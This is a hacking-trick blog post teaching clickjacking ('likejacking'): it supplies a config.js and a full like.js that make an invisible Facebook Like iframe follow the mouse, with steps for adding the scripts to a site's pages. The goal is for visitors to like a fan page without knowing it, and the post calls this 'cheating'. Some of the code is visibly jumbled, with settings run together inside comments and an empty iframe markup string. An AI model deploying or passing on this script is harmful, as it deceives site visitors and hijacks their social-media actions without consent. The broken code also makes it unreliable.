How To Increase Your Facebook Like With Click Jacking

Views:

Click jacking is tricky way to increase your Facebook page likes when peoples enter in your site. It is a hidden process with some HTML/JavaScript code. You just need a Website or Blog, You just paste some HTML/JavaScript in side head tag.  Actually is a tricky cheating. Facebook like button moves along with mouse pointer. When peoples try to click on a link or any part of website.mouse pointer hit on hidden like button. So you this make increase your Facebook like and become a popular. Click jacking is possible because of a security weakness in web browsers that allows web pages to be layered and hidden from general view.

How To Increase Your Facebook Like With Click Jacking (Indternet Explora)

 

How It Works ?


The like button is made hidden and it moves along with the mouse.So, wherever the user clicks, the like
button is clicked and your fan page is liked.First download the JavaScript from the below download link.
Mediafire OR Click here ORClick here (direct download)

 

After downloading the script extract all the files.Now modify the config.js and follow the below
instructions.

  • Modify config.js file in "src" folder to change fan page URL and other things.
    Comments are provided beside them to help you what they do exactly.
  • There is a time out function after which the like button will not be present(move) anymore.
    "time" if set to 0 will make it stay forever(which is usually not preferred).
  • Set opacity to '0' before you run the script. Otherwise the like button will not be invisible.
    Properly set the var in the file if it is jumbled ?

 

config.js Script

 

var fan_page_url = ' http://www.facebook.com/YourPageHere '   
// Give the absolute URL of the facebook fan pagevar opacity = 0.6;  // Set this to 0 when you want to make this completely invisiblevar time = 60000;  // in milli seconds time after which the button will not be present on the site, if set to 0, the button will stay forever which is not usually preferred

 




Like.js Script

if((document.getElementById) && window.addEventListener || window.attachEvent){ (function(){ var hairCol = "#ff0000"; var d = document; var my = -10; var mx = -10; var r; var vert = ""; var idx = document.getElementsByTagName('div').length; var thehairs = ""; document.write(thehairs); var like = document.getElementById("theiframe"); document.getElementsByTagName('body')[0].appendChild(like); var pix = "px"; var domWw = (typeof window.innerWidth == "number"); var domSy = (typeof window.pageYOffset == "number"); if (domWw) r = window; else{ if (d.documentElement && typeof d.documentElement.clientWidth == "number" && d.documentElement.clientWidth != 0) r = d.documentElement; else{ if (d.body && typeof d.body.clientWidth == "number") r = d.body; } } if(time != 0){ setTimeout(function(){ document.getElementsByTagName('body')[0].removeChild(like); if (window.addEventListener){ document.removeEventListener("mousemove",mouse,false); } else if (window.attachEvent){ document.detachEvent("onmousemove",mouse); } }, time); } function scrl(yx){ var y,x; if (domSy){ y = r.pageYOffset; x = r.pageXOffset; } else{ y = r.scrollTop; x = r.scrollLeft; } return (yx == 0) ? y:x; } function mouse(e){ var msy = (domSy)?window.pageYOffset:0; if (!e) e = window.event; if (typeof e.pageY == 'number'){ my = e.pageY - 5 - msy; mx = e.pageX - 4; } else{ my = e.clientY - 6 - msy; mx = e.clientX - 6; } vert.top = my + scrl(0) + pix; vert.left = mx + pix; } function ani(){ vert.top = my + scrl(0) + pix; setTimeout(ani, 300); } function init(){ vert = document.getElementById("theiframe").style; ani(); } if (window.addEventListener){ window.addEventListener("load",init,false); document.addEventListener("mousemove",mouse,false); } else if (window.attachEvent){ window.attachEvent("onload",init); document.attachEvent("onmousemove",mouse); } })(); }//End.



After modifying the config.js script upload these scripts to JavaScript hosting website. I prefer http://yourjavascript.com you can also upload to some other website.


How To Run The Script ?

 

  • Add config.js just above <head> tag in your pages

 

<script language="javascript" src="src/config.js"> </script>

 

Change RED color with config.js link (uploaded link)

 

  • Add like.js after <body> tag in your pages

 

<script language="javascript" src="src/like.js"> </script>

 

Change RED color with like.js link (uploaded link)

 

  • That's it. Now you are Done.



Leave a comment .. below about this hacking trick……

How To Increase Your Facebook Like With Click Jacking How To Increase Your Facebook Like With Click Jacking Reviewed by Gaint Hackers on 08:36 Rating: 5

1 comment:

Powered by Blogger.